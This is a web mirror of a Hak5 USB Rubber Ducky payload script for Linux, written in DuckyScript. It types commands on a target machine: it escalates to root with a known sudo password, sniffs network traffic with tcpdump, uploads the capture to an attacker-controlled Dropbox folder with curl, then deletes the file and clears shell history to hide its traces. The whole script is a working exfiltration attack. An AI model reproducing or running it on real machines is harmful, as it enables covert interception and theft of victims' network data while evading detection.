Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
2968 views
1


2
REM #############################################

3
REM #                                           |

4
REM # Title        : Exfiltrate Network Traffic |

5
REM # Author       : Aleff                      |

6
REM # Version      : 1.0                        |

7
REM # Category     : Exfiltration               |

8
REM # Target       : Linux                      |

9
REM #                                           |

10
REM #############################################

11


12
REM Requirements:

13
REM     - Permissions

14
REM     - Internet Connection

15


16
REM REQUIRED: You need to know the sudo password and replace 'example' with this

17
DEFINE SUDO_PASS example

18
REM REQUIRED: Set what you want to sniff, for example tcp port 80

19
DEFINE SNIFFING example

20
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file

21
DEFINE TOKEN example

22
REM Just a Dropbox const

23
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload

24
REM Output file path packets.pcap, remember to use pcap extension

25
DEFINE FILE example.pcap

26


27


28
DELAY 1000

29
CTRL-ALT t

30
DELAY 2000

31


32


33
REM #### PERMISSIONS SECTION ####

34


35


36
STRINGLN sudo su

37
DELAY 1000

38
STRINGLN SUDO_PASS

39
DELAY 1000

40


41


42
REM #### Network Traffic SECTION ####

43


44


45
STRING FILE_PATH="

46
STRING FILE

47
STRING "

48
ENTER

49
DELAY 500

50


51
STRING filter_expression="

52
STRING SNIFFING

53
STRING "

54
ENTER

55
DELAY 500

56


57
REM Network card name

58
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"

59
DELAY 500

60


61
REM Network dump

62
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &

63
DELAY 500

64


65
REM Get PID

66
STRINGLN tcpdump_pid=$!

67


68
REM Set how long you want to sniff

69
DELAY 60000

70


71
REM Kill the process by PID

72
STRINGLN kill $tcpdump_pid

73


74


75
REM #### Exfiltrate SECTION ####

76
REM You can use whatever you want, i use Dropbox

77


78
STRING ACCESS_TOKEN="

79
STRING TOKEN

80
STRING "

81
ENTER

82
DELAY 500

83


84
STRINGLN DROPBOX_FOLDER="/Exfiltration"

85
DELAY 500

86


87
STRING curl -X POST

88
STRING DROPBOX_API_CONST

89
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"

90
ENTER

91


92


93
REM #### REMOVE TRACES ####

94


95


96
STRINGLN rm "$FILE_PATH"

97
DELAY 500

98


99
STRINGLN history -c

100
DELAY 500

101


102
REM Exit from Sudo user

103
STRINGLN exit

104
DELAY 500

105


106
REM Close the shell

107
STRINGLN exit

108


109